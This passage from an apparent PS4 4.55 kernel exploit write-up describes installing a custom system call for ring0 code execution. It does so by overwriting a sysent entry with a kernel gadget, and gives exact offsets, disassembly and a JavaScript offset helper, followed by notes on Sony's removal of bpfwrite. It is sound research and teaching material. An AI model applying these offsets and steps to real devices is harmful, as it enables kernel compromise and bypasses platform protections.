Our main points of interest are `sy_narg` and `sy_call`. We'll want to set `sy_narg` to 2 (one for the address to execute, the second for passing arguments). We'll want to set the `sy_call` member to a gadget that jumps through the RSI register, since the address of the code to execute is reached through RSI (remember, while the first argument is normally passed in the RDI register, in syscalls RDI is occupied by the thread descriptor `td`, and RSI points to the argument structure `uap`, whose first entry is our code address). A `jmp qword ptr [rsi]` gadget does what we need, and can be found in the kernel at offset `0x13a39f`.
```
LOAD:FFFFFFFF8233A39F FF 26 jmp qword ptr [rsi]
```
In a 4.55 kernel dump, we can see the offset for the `sysent` entry for syscall 11 is `0xC2B8A0`. As you can see, the implementing function is `nosys`, so it's perfectly fine to overwrite.
```
_61000010:FFFFFFFF8322B8A0 dq 0 ; Syscall #11
_61000010:FFFFFFFF8322B8A8 dq offset nosys
_61000010:FFFFFFFF8322B8B0 dq 0
_61000010:FFFFFFFF8322B8B8 dq 0
_61000010:FFFFFFFF8322B8C0 dq 0
_61000010:FFFFFFFF8322B8C8 dq 400000000h
```
By writing `2` to `0xC2B8A0`, `[kernel base + 0x13a39f]` to `0xC2B8A8`, and `0x100000000` to `0xC2B8C8` (we want to change the flags from `SY_THR_ABSENT` to `SY_THR_STATIC`), we can successfully insert a custom system call that will execute any code given in kernel mode!
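The offsets within an entry follow from the `sysent` layout on a 64-bit target, where each entry is 0x30 bytes (six qwords, as in the dump above). The sketch below works out field offsets and splits the last qword into its two 32-bit members. The names `entryField` and `splitFlagsQword` are made up for this example, and the field offsets assume standard amd64 alignment.

```javascript
const SYSENT_SIZE = 0x30; // size of one entry, assuming amd64 alignment of the struct above
const FIELD = { sy_narg: 0x00, sy_call: 0x08, sy_flags: 0x28, sy_thrcnt: 0x2c };

// Offset of a field inside the entry for a given syscall number, relative to the start of the table.
const entryField = (syscallNo, field) => syscallNo * SYSENT_SIZE + FIELD[field];

// Split the qword at +0x28 into its two 32-bit members (little-endian: low half comes first).
function splitFlagsQword(q) {
  return { sy_flags: Number(q & 0xffffffffn), sy_thrcnt: Number(q >> 32n) };
}

console.log(entryField(11, "sy_narg").toString(16), entryField(11, "sy_call").toString(16));
console.log(splitFlagsQword(0x400000000n), splitFlagsQword(0x100000000n));
```

Syscall 11 sits 0x210 bytes into the table, and the qword `400000000h` decodes to a thread-count field of 4 (`SY_THR_ABSENT`), while `0x100000000` decodes to 1 (`SY_THR_STATIC`).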
# Sony's "Patch"
The section header is a lie. Sony didn't actually patch this issue, however they did know that something wonky was going on with BPF as a crash dump accidentally made it to Sony servers from a kernel panic. Via a simple stack trace, they determined that the return address of `bpfwrite()` was corrupted. Sony couldn't seem to figure out how, so they decided to just strip `bpfwrite()` out of the kernel entirely - the #SonyWay. Luckily for them, after many hours of searching, it seems there are no other useful primitives to leverage the filter corruption, so the bug is sadly dead.
Pre-Patch BPF cdevsw:
```
bpf_devsw dd 17122009h ; d_version
; DATA XREF: sub_FFFFFFFFA181F140+1B↑o
dd 80000000h ; d_flags
dq 0FFFFFFFFA1C92250h ; d_name
dq 0FFFFFFFFA181F1B0h ; d_open
dq 0 ; d_fdopen
dq 0FFFFFFFFA16FD1C0h ; d_close
dq 0FFFFFFFFA181F290h ; d_read
dq 0FFFFFFFFA181F5D0h ; d_write
dq 0FFFFFFFFA181FA40h ; d_ioctl
dq 0FFFFFFFFA1820B30h ; d_poll
dq 0FFFFFFFFA16FF050h ; d_mmap
dq 0FFFFFFFFA16FF970h ; d_strategy
dq 0FFFFFFFFA16FF050h ; d_dump
dq 0FFFFFFFFA1820C90h ; d_kqfilter
dq 0 ; d_purge
dq 0FFFFFFFFA16FF050h ; d_mmap_single
dd -5E900FB0h, -1, 0 ; d_spare0
dd 3 dup(0) ; d_spare1
dq 0 ; d_devs
dd 0 ; d_spare2
dq 0 ; gianttrick
dq 4EDE80000000000h ; postfree_list
```
Post-Patch BPF cdevsw:
```
bpf_devsw dd 17122009h ; d_version
; DATA XREF: sub_FFFFFFFF9725DB40+1B↑o
dd 80000000h ; d_flags
dq 0FFFFFFFF979538ACh ; d_name
dq 0FFFFFFFF9725DBB0h ; d_open
dq 0 ; d_fdopen
dq 0FFFFFFFF9738D230h ; d_close
dq 0FFFFFFFF9725DC90h ; d_read
dq 0h ; d_write
dq 0FFFFFFFF9725E050h ; d_ioctl
dq 0FFFFFFFF9725F0B0h ; d_poll
dq 0FFFFFFFF9738F050h ; d_mmap
dq 0FFFFFFFF9738F920h ; d_strategy
dq 0FFFFFFFF9738F050h ; d_dump
dq 0FFFFFFFF9725F210h ; d_kqfilter
dq 0 ; d_purge
dq 0FFFFFFFF9738F050h ; d_mmap_single
dd 9738F050h, 0FFFFFFFFh, 0; d_spare0
dd 3 dup(0) ; d_spare1
dq 0 ; d_devs
dd 0 ; dev_spare2
dq 0 ; gianttrick
dq 51EDE0000000000h ; postfree_list
```
Notice the data for `d_write` is no longer a valid function pointer.
# Conclusion
This was a pretty cool bug to exploit and write up. While the bug is not incredibly helpful on most other systems, as it cannot be exploited by an unprivileged user, it is still valid as a method of going from root to ring0 code execution. I thought this would be a cool bug to write up (plus I love writing them anyway) as the attack strategy is fairly unique (using a race condition to trigger an out-of-bounds write on the stack). It's also a fairly trivial exploit to implement, and the strategy of overwriting the return pointer on the stack is an easy method for learning security researchers to understand. It also highlights how, while an attack strategy may be old (this one perhaps being the oldest there is), it can still be applied in modern exploitation with slight variations.
# Credits
[qwertyoruiopz](https://twitter.com/qwertyoruiopz)
# References
[Watson FreeBSD Kernel Cross Reference](http://fxr.watson.org/fxr/source/?v=FREEBSD90)
[Microsoft Support : Description of race conditions and deadlocks](https://support.microsoft.com/en-us/help/317723/description-of-race-conditions-and-deadlocks)